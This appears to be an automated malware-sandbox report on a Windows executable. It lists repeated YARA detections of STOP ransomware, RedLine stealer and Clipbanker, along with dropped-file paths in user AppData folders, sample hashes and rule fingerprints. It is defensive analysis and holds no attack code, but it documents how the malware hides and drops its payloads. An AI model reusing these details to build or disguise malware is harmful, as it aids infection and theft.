Source: 00000011.00000000.364650257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040706A 0_2_0040706A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_004082BA 0_2_004082BA
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040D240 1_2_0040D240
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00419F90 1_2_00419F90
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040C070 1_2_0040C070
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042E003 1_2_0042E003
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042F010 1_2_0042F010
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00410160 1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004021C0 1_2_004021C0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044237E 1_2_0044237E
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_004344FF 1_2_004344FF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449506 1_2_00449506
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0043E5A3 1_2_0043E5A3
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044B5B1 1_2_0044B5B1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040A660 1_2_0040A660
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0041E690 1_2_0041E690
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00402750 1_2_00402750
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040A710 1_2_0040A710
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040F730 1_2_0040F730
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044D7A1 1_2_0044D7A1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042C804 1_2_0042C804
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00481920 1_2_00481920
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044D9DC 1_2_0044D9DC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449A71 1_2_00449A71
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00443B40 1_2_00443B40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00402B80 1_2_00402B80
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0044ACFF 1_2_0044ACFF
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040DD40 1_2_0040DD40
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0040BDC0 1_2_0040BDC0
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_0042CE51 1_2_0042CE51
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00420F30 1_2_00420F30
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00449FE3 1_2_00449FE3
Uses 32bit PE files
Source: U59WtZz2Sg.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
